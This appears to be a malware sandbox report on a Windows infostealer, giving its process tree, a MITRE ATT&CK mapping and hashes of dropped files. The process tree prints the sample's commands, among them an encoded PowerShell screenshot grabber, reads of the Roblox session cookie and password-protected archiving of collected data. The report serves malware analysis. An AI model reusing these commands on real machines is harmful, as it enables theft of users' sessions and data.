        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        10⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3008
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        11⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        10⤵
        
        PID:3052
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        11⤵
        Gathers system information
        
        PID:2416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        10⤵
        
        PID:4912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:3328
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        11⤵
        
        PID:2452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        10⤵
        
        PID:3044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        11⤵
        
        PID:4940
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kx5jv533\kx5jv533.cmdline"
        12⤵
        
        PID:3008
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES43F9.tmp" "c:\Users\Admin\AppData\Local\Temp\kx5jv533\CSCC6879E36597E414292FB697CEB72784.TMP"
        13⤵
        
        PID:3596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:5116
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon"
        10⤵
        
        PID:2196
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon
        11⤵
        
        PID:2596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        10⤵
        
        PID:3660
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        11⤵
        Views/modifies file attributes
        
        PID:1092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:4596
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:4736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        10⤵
        
        PID:4064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4896
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        11⤵
        Views/modifies file attributes
        
        PID:1520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:2404
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:1948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:3512
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:3048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:4088
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:3636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:4920
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:4368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        10⤵
        
        PID:5004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:5008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        10⤵
        
        PID:4228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        
        PID:3860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13642\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\mHmCT.zip" *"
        10⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\_MEI13642\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI13642\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\mHmCT.zip" *
        11⤵
        
        PID:4472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        10⤵
        
        PID:1152
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        11⤵
        
        PID:2776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        10⤵
        
        PID:4736
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        11⤵
        
        PID:4816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        10⤵
        
        PID:516
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        11⤵
        
        PID:1144

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\loader.cmd

Filesize
174B

MD5
2faba03eec79c9a21db29df7aba57d5c

SHA1
06718c6ed9b68ddb87c2ab58989888d83eadfeb9

SHA256
099bf2cf03840cc69ce5b355fc56180bde231346471ac5edd4b87fe528a1e114

SHA512
96b4f4e465b2e4ab014f54acb43e4416ecc5228e234f6c821b92e4c62e3835ee86ce59ce736d28e30a01962c89489079b4459ba3e52015449871cbe0fb6d1225

Download Submit
C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}\loader.exe

Filesize
262KB

MD5
ab039c879a209ec8353239b74762bda6

SHA1
2991df469bb34cba855abc86b9579d44942c9a85

SHA256
35ac2c618b7669edaa4a857fad54fb9580c87bea6eeca498a289e2bf60a23e55

SHA512
4b9aec6cb031f3ccab91a907c005f5a464ce29b4606e215dae7504f237e98f32fa2878aa8b05662765f63e2544241a2f992cf1c9ac163140e5de1d02022a7065

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updateclient.scr

Filesize
11.6MB

MD5
6a38e035957d63a6478ffade82713be2

SHA1
9ed386b5d7b40937e6db0c7351513db28f39ff9b

SHA256
4e50e4ad5189d7e410eb1bdcce73f0ecdfd4f566a2c71fe7852214904659d30b

SHA512
b50c070b313e1f198a9ea5f44bcdc50e5b85a1dd8e2b066c3209481cd7420fae61ecffb72a3b1a2dbc102a1b6028c15dbfe699ead486441f97b43cafed1d6726

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b9c2e6782fd47c983dc61478147f7176

SHA1
ebaf50c810dbeca3846867c685d77ae4c871f253

SHA256
010430a83f5f1bbd71687b20e9055bbdf643c4c4c5d2b9a5d18098a751750a0b

SHA512
bbca313407db73166df19c9a6e5c0ddd520f316dd7ddc0160b2a0cb31139e45aef6f2cff667a3025df56f2bb5e36a4b25dab39a16ff9f914857588d4e3e19834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cd282dfdc20fc9d84de833696d7cad8b

SHA1
a1334a9cec776d7d30aefad2be5b1397f6dc9a22

SHA256
f082f4ab3ac91384585bd9b36c19172f488c552e65ec2cab9bed19c24c076660

SHA512
e248e9729b51dcf511901eceb89bc29e6d3b46cca56b3e440ad6b7bf48005d3b4543ef348a5512014720a39988f482fbdd2d94cb221b87e2fa9b5092b4138003

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1f7db4200ea339f3143e59889c1f3f08

SHA1
a2d80302457c49f7c824461f4d72fdd887bb3e22

SHA256
7b8aca9ab2a36fbebfdaf44f9596c1ee1a8143ae4255084ee41decfb27d5b09e

SHA512
ed21385fe60f50081becdb67b25860de8801d58dce192da82ac9a6af0fa9a626824da57400a16cd645d306ef0fd201ebc1099332f94ac5887244aae279dc3326

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7c069358e839d81880ba5ec68b841c81

SHA1
e5031ccade1551017748dd48ee697954593a5b73

SHA256
5ff5b712af5968f82aefbfcbc3251d52a3b65a7895eeea3f6c14e40252ff8743

SHA512
af2f1ab13f8059dfa8838daf05ebe9033bd9241dc4f43b8305f495e45f1e664b4ddd48f8238c4609e0db1bdb5c99ae6291acbf04e0be9f39e36dc961389b3a30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aaec900735521f805299b4b5c1a6d24c

SHA1
79027d6a32fb1a47145e85752663d85ef0cb4ee4

SHA256
f53334cbba70f50f49096338882f66de938ebc1a0eb677f2f6e46014a081f303

SHA512
c61bbfda417527e6f12495a803cd813e4558d4f4a104f090e78b65f468a1778d65b40d9ba1329c0842726d3126692b74726bae2daa34afd38b2881700f947187

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
52c79f6e8d474a85f0fded81fafcc8f4

SHA1
20ae70e14d44a99cd03967794dd635b0f09c2491

SHA256
4714074cf70b19a140de5c427c3df4b84078f7b561fad34e5cebd58cecefbe4d

SHA512
491f0126d188251ef667eee840d12a189207acce9cb8e8ae2bcc7c8a00c3ca3bec4f14dbb749d27a4bbf9f43df543ed8797fde3132003cef88107ded7a89314d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES43F9.tmp

Filesize
1KB

MD5
b52389147ff1cc3095767b0f6217f025

SHA1
4991a48fcecd088f501faa047b8473aa3fa12750

SHA256
eec3f2042a3c066174f1259078c7669db94d0a930c005505f55b08f3d335315f

SHA512
0f2c69a772804a223b8ae45537901953389815af3e0c823fa1e597d5085751c69cb26284b1c11ed2500285ed044d5ac26186830d46c7aba37ddc6b09578da992

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD3EA.tmp

Filesize
1KB

MD5
efc2cfda2e65bb1a3c2e18e7ccee5872

SHA1
5796b1f7f6087202d0c7fc377273fa4807e9938d

SHA256
42ff6f91ca9a1dcded49127f92e8a999915757814cb2d58facdd936016112061

SHA512
c496f7d0f4cbd7a856102bd18187bb3f6b131485df706c79addbf636605ccb8fd02e30e68f8bc32b979722777ea30df2a41336151a3ee45f713c250bcfe17ae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13642\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13642\_bz2.pyd

Filesize
48KB

MD5
58fc4c56f7f400de210e98ccb8fdc4b2

SHA1
12cb7ec39f3af0947000295f4b50cbd6e7436554

SHA256
dfc195ebb59dc5e365efd3853d72897b8838497e15c0977b6edb1eb347f13150

SHA512
ad0c6a9a5ca719d244117984a06cce8e59ed122855e4595df242df18509752429389c3a44a8ba0abc817d61e37f64638ccbdffc17238d4c38d2364f0a10e6bc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13642\_ctypes.pyd

Filesize
62KB

MD5
79879c679a12fac03f472463bb8ceff7

SHA1
b530763123bd2c537313e5e41477b0adc0df3099

SHA256
8d1a21192112e13913cb77708c105034c5f251d64517017975af8e0c4999eba3

SHA512
ca19ddaefc9ab7c868dd82008a79ea457acd71722fec21c2371d51dcfdb99738e79eff9b1913a306dbedacb0540ca84a2ec31dc2267c7b559b6a98b390c5f3a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13642\_decimal.pyd

Filesize
117KB

MD5
21d27c95493c701dff0206ff5f03941d

SHA1
f1f124d4b0e3092d28ba4ea4fe8cf601d5bd8600

SHA256
38ec7a3c2f368ffeb94524d7c66250c0d2dafe58121e93e54b17c114058ea877

SHA512
